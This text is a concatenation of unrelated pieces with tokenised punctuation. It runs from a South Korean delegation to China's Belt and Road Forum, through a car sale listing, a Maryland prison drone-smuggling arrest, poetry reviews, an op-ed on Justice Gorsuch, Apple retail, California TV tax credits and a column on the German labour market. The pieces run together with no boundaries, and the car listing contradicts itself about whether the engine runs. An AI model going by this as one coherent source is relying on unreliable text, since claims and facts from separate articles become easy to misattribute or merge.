At the invitation of China , a delegation led by Rep. Park Byeong-seug of the Democratic Party will attend the Belt and Road Forum for International Cooperation that will kick off on Sunday for a two-day run , senior presidential secretary for press Yoon Young-chan said in a briefing .
“ The dispatch of the delegation is what ( Chinese ) President Xi Jinping asked when President Moon held a telephone conversation with him yesterday , ” Yoon said , referring to the first telephone talks between the presidents on Thursday .
The delegation will also include two other ruling party lawmakers , Vice Foreign Minister Lim Sung-nam and a high-level official from the finance ministry , the Ministry of Foreign Affairs said .
“ Through the latest forum , the South Korean side plans to explore ways to cooperate bilaterally for regional co-prosperity , including its participation in the Chinese government-led the One Belt , One Road initiative , the ministry said .
The delegation will leave for Beijing on Saturday to join the forum , another government official said earlier in the day .
“ An official invitation came from China recently , ” he said on condition of anonymity . “ We decided to send a delegation comprised of Rep. Park and other government officials . ”
Park , a five-term veteran lawmaker , served as co-chairman of Moon 's presidential campaign team .
His delegation is expected to meet key Chinese government officials on the sidelines of the forum to discuss ways to repair their bilateral ties strained over the deployment of a U.S. missile defense system , known as Terminal High Altitude Area Defense , or THAAD . in South Korea , the official said .
An encounter with North Korean participants may not be ruled out as Pyongyang is also sending its delegation led by the external economy minister to the Chinese forum , according to the official .
The forum is part of China 's so-called “ One Belt , One Road ” project that focuses on its economic connectivity and cooperation with the countries in Eurasia and as far as Europe and Africa . It was suggested by President Xi in 2013 .
As bilateral tensions continued over the deployment under the previous Park Geun-hye government , China had skipped invitation of South Korea to the regional forum while sending out invitations to dozens of other countries including North Korea .
Moon was sworn in as new South Korean president on Wednesday , filling the leadership vacuum prompted by the ouster of Park over a massive scandal . Experts see it as a sign that China is reaching out to South Korea amid friction over the missile system deployment .
The two Asian neighbors have experienced a chill in relations as Beijing has strongly opposed the installation of the THAAD battery for fear it could hurt its security and carried out retaliatory economic measures against South Korean businesses .
On Thursday , Moon and Xi had a phone conversation and agreed to improve the two countries ' ties and cooperate over North Korea 's denuclearization .
kokobj @ yna.co.kr
For years , the Tommy Wiseau film The Room has been celebrated as one of the worst films ever made , eliciting a devoted following of people who enjoy bad acting , worse writing , and inexplicable football-throwing . Nearly two years ago , Greg Sestero—the best friend turned wife-stealer in The Room—announced he was writing a book about his experience with the film , but it looks like it 's finally happening . Via the Instagram account of McNally 's Cristin Stickles comes the above image , and Sestero recently told the UK 's The Independent that it 's due out in October . It 's called The Disaster Artist , and it should be catnip for spoon-throwing Room devotees . Bonus : It was written with Tom Bissell , who covered The Room for Harper 's , and whose “ Expensive Trips Nowhere ” was adapted into the acclaimed film The Loneliest Planet .
Advertisement
Can humans and robots coexist ? A curt and emphatic answer is yes as long as the machines do n't surpass human intelligence . In other words , AI evolution needs to be ...
A report published by International Federation of Robotics ( IRF ) says that there will be 2.6 million robots in the world by 2019 , at least half of which will be installed in industries and the rest will take on the roles of caregivers and assistants .
The caregiving robots will tend to the elderly , work repetitive chores and entertain you when you are not in a mood . This is the stage 1 of Robotic evolution . So far so good .
There is a good probability that humans would share their house space with humanoid-robots a few years down the line . This is when we are the masters and the machines are our servants .
As technology advances , robots will undergo a drastic transformation of their own . Artificial Intelligence ( AI ) and Moore 's law will empower the robots with unprecedented bandwidth . So much so that they will start making autonomous decisions without any human intervention whatsoever .
Consequently , the domestic robots will become hyper-efficient , too . They would no longer wait for your commands to complete a task , they would know what you need and when . If you ask me , the robotic evolution should stop somewhere before this stage .
See , humans , no matter how sharp or intelligent , would pale in intelligence to robots . After all , our biochemical circuitry has limits , but , there are no such barriers to electronic chips . Further , robots of the future will be connected to the cloud . They would have access to a swathe of information ; they would download data on the fly .
So how long will this subservient nature last is the moot question ? Do you think the sentient robots high on their own machine consciousness will take shit from humans ? These questions bother many a scientist and entrepreneur .
Today the world is divided into two camps on the possibility of the machine evolution . One camp has luminaries like Mark Zuckerberg who wo n't stop singing paeans about the AI advantages .
The other camp brims with distractors and cautious optimists . Elon Musk leads this pack . Though he goes overboard with his apocalyptic vision sometimes , I do n't think he 's entirely off the mark . The world needs a more regulated stance when it comes to dealing with robots .
Coming back to the question if humans and robots can coexist . A curt and emphatic answer is yes as long as the machines do n't surpass human intelligence . In other words , AI evolution needs to be tamed before it reaches that breakneck point .
Many people who I spoke to say the world need not see it as a binary situation . Humans and robots are not going to fight wars to gain mastery of the planet earth . I am sorry to say they do n't get it .
The playing field will increasingly tilt in favour of machines until there is a consensual regulation of the AI advancement just like the Nuclear Non-proliferation Treaty . The world does not need ‘ super-intelligent ' machines . They certainly wo n't do what we want them to do . I am okay with those advanced robotic limbs though .
©2017 BookJelly . All rights reserved
Advertisements
Like this : Like Loading ...
Seller notes :
“ ENGINE NOW RUNS ! This car is in need of restoration . There are some minor parts missing but nothing to serious.There is some rust that needs treating and some minor bubbling . There is also a scratch on drivers door . The interior needs restoration but good points are that all vinyl is in good condition with all door panels and dash panels in good condition for the age with no rips , even the seats vinyl panels are fine , its just the hounds tooth cloth parts that need re-trimming . All four hub caps are there and wheels are original , tyres are only good for rolling the car around . The current engine is a 13b rotary from 1974 and not the original 10a rotary engine , it has Dellorto side draught 48 carbs to go with it . The engine was rebuilt around 10 years or so ago for another car and not much used as far as I know . It was not rebuilt by me . Engine does not run but should with some TLC as some things still need to be done to make it run . ”
On Monday , Maryland law enforcement authorities announced the successful bust of two men who tried to use a drone to fly drugs and DVDs loaded with porn into the Cumberland prison in the western part of the state . It 's the first incident of attempted drone contraband within the state , according to officials .
According to Robert Thomas , a spokesman with the Maryland Department of Public Safety and Correctional Services , the two men were stopped in a car along Highway 220 near the facility .
After searching the car , Maryland State Police recovered a quadcopter , synthetic marijuana ( also known as “ spice ” ) , pornography , tobacco , a phone , a loaded handgun , and other materials . According to the Associated Press , the drone was a Yuneec Typhoon , which retails for around $ 1,300 .
`` They were apprehended close to their vehicle that was located on property adjacent to the North Branch Correctional Institution , '' Thomas told Ars . `` A group of investigators is working in that area the night of the incident and apprehended them with their vehicle . In doing so , one tried to flee and ran into a dumpster and tried to hide in a dumpster , and the other was captured at the scene . ''
The gun likely was not going to be delivered by drone as it probably would have weighed down the aircraft .
“ You ca n't make this stuff up , ” Stephen T. Moyer , secretary of the Maryland Department of Public Safety and Correctional Services , told reporters at a press conference on Monday . According to The Washington Post , Moyer added that equipping prisons with drone detection infrastructure would cost up to $ 400,000 per facility .
The two men , Thaddeus Shortz and Keith Brian Russell , have been charged with various crimes , including illegal possession of drugs with the intent to distribute and illegal possession of a firearm .
The Maryland incident is by no means the first contraband-via-drone attempt throughout the US . In late July , a similar incident took place at the Mansfield Correctional Institution in Ohio , where a drone drop of drugs and tobacco resulted in an inmate brawl and a strip search of 205 men . And earlier this month , two men were arrested in Southern California near the US-Mexico border after allegedly using a drone to fly drugs into the country .
6 Min read time Share :
New books from Anne Boyer , Ross Gay , Corina Copp , Noah Eli Gordon , Sandra Simonds
Garments Against Women
Anne Boyer
“ It is probably more meaningful to sew a dress than to write a poem , ” Anne Boyer writes . It is an aphorism whose truth we are meant to test . Is a woman writing the poetry of men and/or capitalism better off sewing ? In Garments Against Women , the answer seems to be yes . The book is wide awake to questions of indoctrination . Are poets writing ( i.e. , producing ) in and for the conditions that are actually against us ? But if poems , like garments , memorialized years of invisible women 's lives , would that make them more meaningful ? Boyer resists that strategy of accounting for the unaccounted : “ To refuse a bookkeeperly transparency is to protect the multiplicity of what we really want. ” Poetry as monument could enlarge a subject , but not , crucially , alter its means and method . Changing the power structure means changing the pattern . Boyer 's calm and paratactic confessions are an anti-poetry : “ I am writing to you in long paragraphs so that I will not be pornography . If you read this you will not be turned on. ” She calls for unimpressive , minor writing , and for not-writing—for value ( or non-value value ) in unproductivity . The book acknowledges its paradox : “ how could it be literature if it is not coyly against literature but sincerely against it , as it is also against ourselves ? ” But that question reflects a narrow paradigm , and Boyer 's is a broad , generous book , for much more than it is against . It is poetry “ without the frame of poetry , ” without a safety net for the writer or the reader .
—Darcie Dennigan
Catalog of Unabashed Gratitude
Ross Gay
Sparsely punctuated , short-lined lyrics in Ross Gay 's third collection , Catalog of Unabashed Gratitude , issue a gushy invitation , tempered at times by grief , to accompany a speaker who counts among his friends the people he meets under fruit trees , ants inside a fig he eats , and you , the reader to whom he expresses gratitude in the title poem : “ I just want us to be friends now , forever . / Take this bowl of blackberries from the garden. ” Like those blackberries , these poems are the horticultural , sensual products of a poet sustained by gardening and the human relationships that the garden helps him create and comprehend . A Philadelphia fig tree with “ giddy throngs of / yellow-jackets sugar / stoned ” motivates a meditation on immigration . A goldfinch feasting on a sunflower and “ steadying itself by snapping open / like an old-timey fan / its wings / again and again ” resembles love . Fertilizing a plum tree with a dead father 's ashes yields the recuperative juice of the father “ almost dancing now in the plum. ” Elegies throughout the collection remind you that connecting with the earth means connecting with the dead buried there and that the garden can not promise safety , let alone paradise . In “ Spoon , ” an elegy for a gay black friend who was murdered , the poet considers the sickening possibility that the unruliness of his own abundant yard might give cause for a racially motivated response “ in Indiana where I am really not from , where , // for years , Negroes were n't even allowed entry , / and where the rest stop graffiti might confirm // the endurance of such sentiments . ”
—Cecily Parks
The Green Ray
Corina Copp
Read Corina Copp 's 2011 Poet 's Sampler in Boston Review , introduced by Dorothea Lasky .
Poet and playwright Corina Copp 's debut collection is protean in language and content but more specifically in its kinship with Ulysses 's third episode , “ Proteus. ” Copp shares Joyce 's mood of solitary reflection , in which theoretical concepts , family , alterity , mortality , and sex are analyzed in snatches of thought , creating a sense of narrative tease and a flow of cognizance that changes focus quixotically . Like “ Proteus , ” The Green Ray—which shares its title with films by Eric Rohmer and Tacita Dean—grounds its movements in body and soil : “ to fuck be- / hind not behind but that I 'm not one / for anal bleach , by which I mean Unicorn / Arras behind which I get anal bleached or. ” That “ or ” is one key to Copp 's approach , through which meaning is pressed into chance and chance is engaged rather than simply wondered at . There is drifting in The Green Ray , but , carried along with the drifter , there is also always a faith in possibility : “ the Evolutionary Transformative / Agent , a quality well we all have that / instinctively understands the greater / plan. ” Copp 's work is empathetic ; it persistently wrestles with how to respond to ruptures , whether large or ordinary . She meets concern , even anxiety , about the relationship between interior and exterior life by grappling with the intersections between the two : what they might mean and what we hope they mean .
—Adam Day
The Word Kingdom in the Word Kingdom Kingdom
Noah Eli Gordon
Read Noah Eli Gordon 's work in Boston Review .
Noah Eli Gordon 's The Word Kingdom in the Word Kingdom packs a double-handed wallop , battering the reader with poems as abashed by the fact of their poemhood ( “ I 'm writing with my arms raised ” ) as they are unapologetically brazen about it ( “ The poem is n't interested in helping you ” ) . Poems such as “ An Experiment in Artifice and Abject-Oriented Ontology ” proceed in a largely essayistic manner but downplay their meaning-making with a lack of clarifying punctuation , a condition that captures the complex , self-reflexive nature of the collection as a whole . The phrasing of such poems should be appreciated musically as much as , if not more than , semantically—a reading strategy appropriate to Gordon 's persistent obsession with the limits and vagaries of language itself . But even as these poems openly question their own figuration and the linguistic medium in general , they also find nonrepresentational material reality insufficient : “ How many types of ambiguity / can a muffin conjure up ? ” Ultimately , to call The Word Kingdom in the Word Kingdom self-reflexive does n't quite do these slyly exacting poems justice . Whereas self-reflexivity suggests a mirror facing a mirror , Gordon 's poems tend to be more like a hammer hitting a mirror—he short circuits the predictable , facile circularity that typically arises when language becomes aware of itself : “ To paint the word lighthouse on a lighthouse is deserving of shipwreck. ” These poems are not playing games . Rather , they are attempting , without becoming precious or overly self-serious , to be sincere : “ If I were to say , ‘ The only thing inside a muffin / is muffin , ' I would certainly mean it . ”
—Carlo Matos
The Sonnets
Sandra Simonds
Read Sandra Simonds 's work in Boston Review .
While the fifty-six poems in The Sonnets are unmistakable sonnets , they often work against the form they ploy , pushing at the limits of rhyme , word , and line , and generally buking sonnet decorum . `` Ducks Floating Serently across Pond Make Scenery Serene '' begins , `` Fuck all I say fuck all '' ( the line recurs ) , repeating `` fuck '' nineteen times in fourteen lines ; `` I Love You So So So Soooooo Much '' makes use of twelve little ♥-signs ; “ Collapsible Sledgehammer ” features a functional Internet URL as a line . “ This Is the New Romantic ” ends , “ This is the new romantic® : I 'll post everything / on the internet to devalue® it® for free. ” In this collection , Simonds 's third , poetic language never sets itself apart from other language . Instead , the poet mobilizes the sonnet 's traditional resources—as space of compression , site of subjective exploration , instrument for world-making—to speak from within and about the pressures of a very real economics : How do you write poems while caring for children , teaching composition , and trying to make rent ? How do you think about—for example—domestic violence , Bikram Yoga , and being in love , all at once ? The world is an exhausting place full of unsustainable contradictions ; the sonnet holds some parts of it uncomfortably , energetically , together . From preset structures and rhythms emerges a very voicey subject ( “ I write / what I sing like karaoke . I sing what I write / like Kryptonite ” ) who engages forces of history , culture , and labor , gathering them up and spikily resisting them , as in “ The Soul as Lo-Fi Diva ” : “ She wears watermelon lip gloss and licks her lips / to a metronome set to civil disobedience . ”
—Lindsay Turner
Whatever else comes of the Donald J. Trump presidency , already he has perfectly fulfilled one campaign pledge in a way that will affect the entire United States for a generation or more : putting another Antonin Scalia on the Supreme Court . The early signs from Justice Neil Gorsuch , who joined the Court in April , show that he will hew to the late Justice Scalia 's brand of jurisprudence , both in his conservatism and his boldness .
Usually it takes a few years to get the full sense of a new justice . The job provides awesome power , and new justices often are reluctant to issue stark opinions or stake out strong positions early on . Chief Justice John Roberts and Justice Samuel Alito , for example , were at first cautious on campaign finance and voting rights issues . Only later did they sign on to blockbuster decisions like 2010 's Citizens United campaign finance case ( allowing corporations to spend unlimited sums in elections ) or 2013 's Shelby County voting case ( in effect killing off a key Voting Rights Act provision ) .
Not so with Gorsuch . In a flurry of orders and opinions issued Monday , Gorsuch went his own way . The majority affirmed the right of same-sex parents to have both their names appear on birth certificates , but Gorsuch dissented . The majority chose not to hear a challenge to California 's public carry gun law , thus leaving it in place , but Gorsuch dissented . Gorsuch also wrote separately in the Trinity Lutheran case , on whether a parochial school may take government money for playground safety equipment . The court found in favor of the school , but Gorsuch went even further to the right in endorsing the government 's ability to aid religious organizations . This followed his dissent with Justice Clarence Thomas a few weeks ago over the court 's failure to consider overturning the “ soft money ban ” in the McCain-Feingold campaign finance law .
There 's little doubt that , like Scalia , conservatives will be able to count on his vote .
Gorsuch also joined with conservatives Alito and Thomas to partially dissent from the Supreme Court 's Monday order in the travel ban case . The court split the baby , ruling that until the court hears the case this fall , only part of the ban may go into effect . ( The government can not enforce the travel ban against foreign individuals from six predominantly Muslim nations who have family , work or university connections to people or entities in the United States . ) The dissenters would have allowed the Trump administration to enforce the entire ban until the court could fully consider the case .
Setting aside his emerging alliance with Thomas and Alito , Gorsuch has already staked out some positions just for himself . In Monday 's Hicks vs. United States decision , Gorsuch found himself disagreeing with Thomas and Roberts and siding with a criminal defendant . “ A plain legal error infects this judgment — a man was wrongly sentenced to 20 years in prison under a defunct statute , ” Gorsuch wrote . He voted in favor of granting relief while Thomas and Roberts voted against . In this too he resembles Scalia , who issued some surprising decisions favoring criminal defendants . ( Both sides cited an earlier opinion by Scalia on when it is appropriate to send the case back to the lower court to fix the error . )
Gorsuch also seems to share Scalia 's unyielding confidence that it is possible to apply grammatical rules of statutory interpretation to reach the “ right ” result in even thorny cases construing federal law . Indeed , he treated his first majority opinion about who counts as a “ debt collector ” under federal law — in Henson vs. Santander Consumer U.S.A. — as essentially a grammar lesson applying Scalian “ textualism. ” And writing for himself , Alito and Thomas last week in Perry vs . Merit Systems Protection Board , he snarkily declared “ If a statute needs repair , there 's a constitutionally prescribed way to do it . It 's called legislation . ”
The next term of the Supreme Court is shaping up to be a major one , including not only the travel ban case , but also the so-called cake shop case on whether a religious business owner can deny services to same-sex couples . In due time , the court will no doubt also tackle more cases involving abortion , voting rights , gun rights and campaign finance . While the precise contours of Gorsuch 's opinions are uncertain , and he could surprise in criminal cases , there 's little doubt that , like Scalia , conservatives will be able to count on his vote .
Richard L. Hasen , a professor of law and political science at the UC Irvine School of Law , is working on a book about Scalia 's legacy .
Follow the Opinion section on Twitter @ latimesopinion or Facebook
Walk into the local Apple Store at 10:35 on a Friday morning and you 'll notice something different : normal people .
These are not the mutants you 'll find trolling Fry 's for a new motherboard , a liter of Mountain Dew and packets of beef jerky . These are not the middle-aged pot-bellied dudes you 'll find eyeing the latest big screen television at Best Buy .
These are people like your mom . Among the 20 customers at the store Friday were several older women . One was getting a quick tutorial on how to download digital movies .
What 's up with that ? I asked my mother-in-law . `` There 's always someone there to answer your questions , '' she said of Apple 's stores . `` I like that . ''
A lot of people do . Little wonder analysts expect to see increasing sales -- and fat margins -- when Apple reports earnings for the quarter ending in June . The report is due out on Tuesday afternoon . Analysts surveyed by Thomson Reuters expect net income of $ 1.1 billion , or $ 1.16 a share , compared to net income of $ 1.1 billion , or $ 1.19 , during the corresponding period a year ago . Sales are expected to rise to $ 8.2 billion from $ 7.5 billion .
Earlier this year , Microsoft hired Dreamworks and Wal-Mart veteran David Porter to build its own stores . But there 's more to Apple 's retail success than just a clean , well-lit space . It 's also about a business model with plenty of price points and no loss leaders .
That 's why Apple 's gross margin is expected to fall just a few tenths of a percent to 34.2 % down from 34.8 % during the corresponding period a year ago , despite the economic meltdown . It also explains why over the past year , Apple shares have fallen 8.1 % to $ 151.75 from $ 166.29 . The S & P 500 , by contrast , has fallen more than 25 % over the same period .
New products have helped , of course . Apple 's latest -- the new iPhone 3G S and cheaper , more powerful MacBooks -- are selling well , analysts say . On Friday J.P. Morgan analyst Mark Moskovitz said he was raising his estimate for the number of iPhones sold in the June quarter to 4.34 million from 4.0 million , and the number of Macs to 2.5 million from 2.13 million .
Apple , however , is skilled at surrounding customers with products at different -- profitable -- price points . Just walk into the Burlingame Apple Store . You 'll find iPhones and iPods on the left , and MacBooks and iMacs on the right . If the $ 229 iPod Touch is too pricey , you can try the tiny $ 79 iPod Shuffle . The price points may differ , but the Shuffle 's margin is fat . That 's how Apple can keep chugging away , even as the average selling price of its computers , for example , slid during the quarter ending in March .
Further back you 'll find software and accessories such as the Airport Extreme . Then there are the gift cards and accessories from Griffin , Belkin and Nike . Those accessories represent profits piled on top of profits . Not only does Apple sell these gimcracks in its stores , it charges companies licensing fees for the right to design their gear around Apple 's products .
Not that it would matter if Apple could n't put customers in front of all this stuff . That 's where the store 's open , airy space works well . Women wander in with dogs on leashes . A middle-aged dude in shorts stops by to ask a question about his phone at the genius bar .
Near the front of the store , a teen in a Def Leppard shirt flexes his bicep as his girlfriend takes a snap with one of the iPhones on display . Time for a little informal market research . Would either of them buy a tablet computer from Apple that is said to be coming ? `` Not really , for me it 's either my iPhone or a laptop , '' the guy in the Def Leppard shirt says .
`` I like something small , '' his companion , a young woman with a lip piercing says .
Who knows though . If Apple were to introduce a tablet , the kids might not understand it . But with a little help from someone at the Apple Store , Mom will . She might even buy a few .
See Also :
Microsoft Stores Coming This Fall -- Right Next To Apple Stores
Why Apple Could Kill Your Camera
Apple Hates Your Netbook
Production of Fox 's “ Scream Queens ” will relocate to California , and the new series “ Good Girls Revolt , ” “ Shooter ” and “ I 'm Dying Up Here ” will get state tax incentives , as part of the latest round of tax credits awarded by the California Film Commission .
Also receiving credits are season six of FX 's “ American Horror Story ” and additional episodes of HBO 's “ Westworld , ” after being awarded incentives in earlier rounds . Three pilots — “ Bunker Hill , ” “ Citizen ” and “ Four Stars ” — will receive credits .
The commission announced the latest round of credits on Wednesday ; 21 TV projects vied for $ 37.6 million in credits , and nine projects were picked . This was the fifth and final application round this fiscal year , which ends June 30 .
“ Scream Queens ” filmed its first season in New Orleans , and will begin production in California in July . It is the second series from Ryan Murphy and Brad Falchuk to relocate to the state , after “ American Horror Story ” moved back to California for the current season .
The California Film Commission said that the nine approved projects will generate an estimated $ 313 million in direct spending , including $ 121 million in wages to below-the-line crew members .
Related FX Networks Chief John Landgraf on Future of 'Fargo , ' 'American Horror Story , ' 'Feud ' and 'Atlanta ' Los Angeles On-Location Feature Filming Surges 12.2 % in 2018
The pilot for Amazon 's “ Good Girls Revolt , ” produced by Mesquite Prods. , was shot in New York , while the pilot for the USA Network 's “ Shooter , ” from Paramount Television , was shot in Vancouver .
Amy Lemisch , executive director of the film commission , said that five series have relocated to California under the expanded incentive program that went into effect almost a year ago . The state more than tripled the annual outlay for the program , to $ 330 million .
Projects are selected based on a jobs ratio score that weighs the amount that a production will spend on below-the-line wages and spending on equipment and vendors .
“ Our success in helping five existing TV series relocate to California in less that a year illustrates the success we 're achieving with the expanded tax credit program , ” she said .
The commission said that , by the end of this fiscal year , the expanded program is on track to generate $ 1.7 billion in direct in-state spending , including $ 659 million in below-the-line wages . The commission expects an even greater boost in the 2016-17 fiscal year , when the amount available for projects increases to the full $ 330 million . The current year allocation was $ 230 million , as $ 100 million was directed to the previous version of the tax credit program , in which applicants competed for incentives by lottery .
The application period for the next fiscal year will be held on May 20-27 for TV projects , and June 27-July 8 for independent and non-independent feature films .
The allocations for each project : “ American Horror Story , ” $ 9.3 million ; “ Scream Queens , ” $ 9.2 million ; “ Good Girls Revolt , ” $ 5.2 million ; “ Shooter , ” $ 4.1 million ; “ Westworld , ” $ 4 million ; “ I 'm Dying Up Here , ” $ 2.2 million ; “ Citizen , ” $ 1.5 million ; “ Four Stars , ” $ 1.1 million ; “ Bunker Hill , ” $ 991,000 .
The German labour-market miracle
Michael Burda , Jennifer Hunt
Jobs and the lack of them are top of the agenda for policymakers and increasingly groups of protestors gathered in the financial districts of New York , London , and elsewhere . Unemployment in these countries is in danger of reaching 10 % . In Germany , however , unemployment is below 7 % . Some hail it as a miracle . This column finds a scientific – and far less inspiring – explanation .
At a time when unemployment rates in France , Italy , the UK , and the US are stuck around 8 % -9 % , many are turning to the apparent miracle in the German labour market in search of lessons . In 2008–09 , German GDP plummeted 6.6 % from peak to trough , yet joblessness rose only 0.5 percentage points before resuming a downward trend , and employment fell only 0.5 % . In August 2011 , the standardised unemployment rate was about 6.5 % , the lowest since the post-reunification boom of 20 years ago ( Source : Bureau of Labour Statistics ) .
Reaction to this success has bordered on smugness in some quarters . Many have asserted that superior German labour-market institutions , particularly those facilitating reductions in hours per worker in a recession , were chiefly responsible for the miracle ( Schneider and Graef 2010 , Klös and Schäfer 2010 , Möller 2010 , German Council of Economic Advisors 2010 ) . Yet these institutions have been in place for decades , so can not explain why of five recessions since 1970 , only the 2008–09 episode was not accompanied by plunging employment and a stubbornly higher unemployment rate . Recognising this , other German observers stress the continuing importance of reforms to the labour market enacted in 2003–05 ( Gartner and Klinger 2010 ) , and the absence of wage growth since 2001 ( Boysen-Hogrefe and Groll 2010 , Gartner and Klinger 2010 ) .
In recent research ( Burda and Hunt 2011 ) , we show that one unnoticed explanation can explain a significant component of the reputed economic miracle . In the export-driven expansion of 2005–07 , firms hired significantly less than that expected , given the extent warranted by GDP and wages . As evidenced by data on firm expectations and articles in the business press , firms had unusually low confidence the boom would last . We show that the missing employment increase in the 2005–07 boom was equivalent to 40 % of the missing employment decline in 2008–09 , and that more than half of the missing employment increase was attributable to firms ' pessimistic expectations . Firms hesitated to hire in the boom , as they feared it would not last , and when eventually the recession they feared arrived , they had less need to fire than in previous recessions .
Did flexibility in hours per worker shield the labour market ?
American observers are rightly intrigued by the system of short-time work used in Germany and certain other European countries ( Boeri and Bruecker 2011 , OECD 2010 ) . Under this system , a firm in financial difficulties can apply to the employment agency for approval of a package whereby the firm reduces workers ' hours and variable pay in proportion and refrains from layoffs , while workers are reimbursed by the employment agency for 60-67 % of their lost pay . Abraham and Houseman ( 1993 ) showed this system leads to more cyclical hours per worker and less cyclical employment than in the US . Hours per worker indeed fell precipitously in the 2008–09 recession , by almost 4 % . Yet the hours of short-time work compensated were no greater than in the 1974–75 recession .
There is another factor which helps account for the significant reduction of hours during what many now call the ‘ Great Recession ' . A new personnel management tool , working-time accounts , has been used increasingly by German employers to adjust hours per worker flexibly to short-term fluctuations . Employers may increase hours above standard hours without immediate additional pay , as long as hours are reduced in the future with no loss of pay so as to keep average hours at standard hours within a moving time window . The number of hours the employer owes the worker is tracked in a working-time account . The share of workers with such an account rose from 33 % in 1998 to 48 % in 2005 ( Gross and Schwarz 2007 ) , possibly permitting greater adjustment of hours per worker in the 2008–09 recession than in earlier recessions .
At the same time , an important finding of our research is that the fall in overall hours per worker in the Great ( German ) Recession was not surprising given its severity . It must have been the case that employers used working-time account balances to postpone or reduce their use of government short time , leaving overall hours flexibility little changed . On the other hand , working-time accounts probably played a role in stemming the employment decline by providing a disincentive to fire , since employers must compensate laid-off workers for any outstanding positive balance . Employer behaviour in cutting hours per worker was similar to the past , but they retained more workers on shortened hours . A theoretical model which differentiates between employment changes at the extensive and intensive margin can explain this behaviour , to the extent that underlying parameters of that model changed over the past 10-15 years .
Does wage moderation explain the employment pattern ?
Worker bargaining power has declined in Germany since reunification . This is reflected by a decline in union membership and coverage of union agreements , increasingly decentralised wage bargaining , and union concessions such as the use of working-time accounts . One causal factor is likely the emergence of Eastern Europe as a competing location for manufacturing production . Since 2001 , average hourly wages have stagnated in real terms . Assuming an ‘ off-the-shelf ' estimate of labour-demand elasticity with respect to wages of 0.7 – we show that if wages had continued rising at the pace of the 1990s ( 1.12 log points per year ) , employment would have declined much more in the recession – by an amount equal to 20 % of the missing employment decline .
A potential role for labour-market reforms
In 2003–05 a series of labour-market reforms was undertaken in Germany : more experience was required to qualify for unemployment benefits , the duration of benefits was cut for the older unemployed , the follow-on benefit was merged with the less generous welfare programme , the onus of job search was put on the unemployed person for the first time , sanctions for refusing job offers were enforced , private firms were recruited to help place the unemployed , the employment agency was reorganised and temporary work agencies deregulated . These reforms would have been expected to lower unemployment , and there is some evidence that they did . If their effects occurred with a lag extending into the recession , the reforms could have moderated the employment decline . There is some evidence consistent with this – the Beveridge Curve continued to shift in throughout the recession , while the share of long-term unemployed continued to decline throughout the recession – but it is impossible to judge the likely magnitude of the effect .
Expectations in the 2005–07 expansion
Our account for the missing hires in the 2005–07 expansion relies on pessimistic firm expectations , and the increasing cost of adjusting employment at the extensive margin , which make expected future determinants of labour demand more important in the determination of current employment plans . In our paper , we first identify manufacturing as the industry with the missing employment increase in the boom and the missing employment decline in the recession . We then use data on firm expectations from the Ifo Institute to show that in manufacturing , but not other sectors , there was an anomalous gap in the 2005–07 boom between firms ' assessment of the current situation and their expectations for six months in the future . Figure 1 illustrates this , plotting the difference between the share of firms reporting their current situation is favourable versus unfavourable , and the difference between the share expecting an improvement in the subsequent six months versus a deterioration . Only in the uncertain period immediately following reunification were expectations similarly low compared to the assessment of the current situation . Our analysis of reports in the business daily Handelsblatt during the expansion confirms that firms were uncertain the boom would last .
Figure 1 . Manufacturing firms ' business assessments
Note : Current refers to the difference between the share of firms reporting their current situation is good rather than poor ; Expect refers to the difference between the share of firms reporting they expect their situation in six months to be more favourable rather than less favourable .
Source : Ifo Institute , Munich .
We use the Ifo data to generate counterfactual expectations based on the historical relation between firms ' assessment of the current situation and expectations , and we use the counterfactual expectations to predict what the employment increase in the boom would have been had firms formed their expectations as in the past . We find that pessimistic employer expectations in the boom explain 56 % of the missing employment increase , and hence 23 % of the missing employment decline in the recession .
Implications
It would be heartening were institutions facilitating cuts in hours per worker able to eliminate employment declines in a recession entirely , but this does not appear to be the case . Rather , the extraordinary performance of the German labour market in 2008–09 can most clearly be tied to a possible one-off event with less favourable social welfare implications . In other words , firms had less need to lay off than in a typical recession , because an unusual lack of confidence in the preceding boom had made them reticent to hire .
Some of the dampening of the employment cycle may also be due to firing disincentives implicit in the system of working-time accounts , rather than to the 2005–07 firm pessimism we were able to quantify . Other countries may want to examine this labour practice , as well as the labour-market reforms enacted in 2003–05 .
In addition , growing concerns about shortages of skilled labour could reflect increasing marginal costs of changing the extensive margin , which would also lead to a more sluggish , drawn-out reaction to expected future determinants of labour demand . At the same time , by 2009 there was evidence in the business press that firms were confident that the ( export-driven ) recession would be relatively brief . It is not entirely clear that this will be repeated in future recessions .
References
Abraham , Katharine G and Susan N Houseman ( 1993 ) , Job Security in America : Lessons from Germany . Washington , Brookings Institution .
Boeri , Tito and Herbert Brücker ( 2011 ) , “ Short-Time Work Benefits Revisited : Some Lessons from the Great Recession ” , Institute for the Study of Labour Discussion Paper 5635 , April .
Boysen-Hogrefe , Jens and Dominik Groll ( 2010 ) , “ The German Labour Market Miracle ” , National Institute Economic Review , 214 : R38-R50 .
Burda , Michael , and Jennifer Hunt ( 2011 ) , “ What Explains the German Labor Market Miracle in the Great Recession ? ” CEPR Discussion paper 8520 , August .
Gartner , Hermann and Sabine Klinger ( 2010 ) , “ Verbesserte Institutionen für den Arbeitsmarkt in der Wirtschaftskrise ” , Wirtschaftsdienst , 90 ( 11 ) :728-734 .
German Council of Economic Advisors ( 2010 ) , Jahresgutachten 2009/10 : Die Zukunft nicht aufs Spiel setzen . Paderborn : Bonifatius .
Gross , Hermann und Michael Schwarz ( 2007 ) , “ Betriebs- und Arbeitszeiten 2005 : Ergebillionisse einer repäsentativen Betriebsbefragung ” , Beiträge aus der Forschung : Sozialforschungsstelle Dortmund , 153:1-174 .
Klös , Hans-Peter and Holger Schäfer ( 2010 ) , “ Krisenmanagement über Variationen des Arbeitsvolumens ? ” , Arbeit , 2-3:132-146 .
Möller , Joachim ( 2010 ) , “ The German labour market response in the world recession – de-mystifying a miracle ” , Zeitschrift für Arbeitsmarkforschung , 42 ( 4 ) :325-336 .
Organisation for Economic Cooperation and Development ( OECD ) ( 2010 ) , Employment Outlook 2010 : Moving Beyond the Jobs Crisis , Organisation for Economic Cooperation and Development .
Sachverständigenrat zur Begutachtung der gesamtwirtschaftlichen Entwicklung ( 2010 ) , Jahresgutachten 2009/10 : Die Zukunft nicht aufs Spiel setzen Paderborn : Bonifatius GmbH Buch-Druck-Verlag .
Schneider , Stefan and Bernhard Graef ( 2010 ) , “ Germany 's jobs miracle : Short-time work , flexible labour contracts and healthy companies ” , Deutsche Bank Research Briefing , 27 April .
